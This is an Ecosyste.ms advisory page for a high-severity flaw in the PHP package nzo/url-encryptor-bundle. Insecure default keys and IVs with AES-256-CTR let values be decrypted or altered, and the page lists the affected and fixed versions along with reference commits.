Ecosyste.ms: Advisories
An open API service providing security vulnerability metadata for many open source software ecosystems.
Security Advisories: GSA_kwCzR0hTQS1yMnI4LTM2cHEtMjdjbc4AA8Rw
nzo/url-encryptor-bundle Insecure default secret key and IV allowing anyone to decrypt values
Versions of nzo/url-encryptor-bundle prior to 5.0.1 and 4.3.2 are affected by a security vulnerability related to the lack of mandatory key and IV requirements. By default, the bundle uses the aes-256-ctr algorithm, which is susceptible to malleability attacks, potentially leading to Insecure Direct Object Reference (IDOR) vulnerabilities. Additionally, the reuse of keys enables users to decrypt and modify encrypted data if they can guess the plaintext of one ciphertext.
Permalink: https://github.com/advisories/GHSA-r2r8-36pq-27cmJSON: https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS1yMnI4LTM2cHEtMjdjbc4AA8Rw
Source: GitHub Advisory Database
Origin: Unspecified
Severity: High
Classification: General
Published: 6 months ago
Updated: 6 months ago
Identifiers: GHSA-r2r8-36pq-27cm
References:
- https://github.com/nayzo/NzoUrlEncryptorBundle/commit/ba3af1a9bcf3bedcc0ed5948979f482e2134da1a
- https://github.com/nayzo/NzoUrlEncryptorBundle/commit/bd8232501c12c9df1bc45b1970870ef665218581
- https://github.com/FriendsOfPHP/security-advisories/blob/master/nzo/url-encryptor-bundle/2020-05-03.yaml
- https://github.com/advisories/GHSA-r2r8-36pq-27cm
Blast Radius: 0.0
Affected Packages
packagist:nzo/url-encryptor-bundle
Dependent packages: 1Dependent repositories: 25
Downloads: 803,075 total
Affected Version Ranges: >= 4.0.0, < 4.3.2, >= 5.0.0, < 5.0.1
Fixed in: 4.3.2, 5.0.1
All affected versions: 4.1.0, 4.2.0, 4.2.1, 4.2.2, 4.2.3, 4.3.0, 4.3.1, 5.0.0
All unaffected versions: 4.3.2, 4.4.0, 4.5.0, 5.0.1, 5.1.0, 5.2.0, 6.0.0, 6.0.1, 6.1.0, 6.1.1, 6.2.0, 6.2.1, 6.2.2, 6.2.3, 6.2.4, 6.2.5, 6.2.6, 6.2.7, 6.2.8, 6.2.9, 6.3.0, 6.3.1, 6.3.2, 6.3.3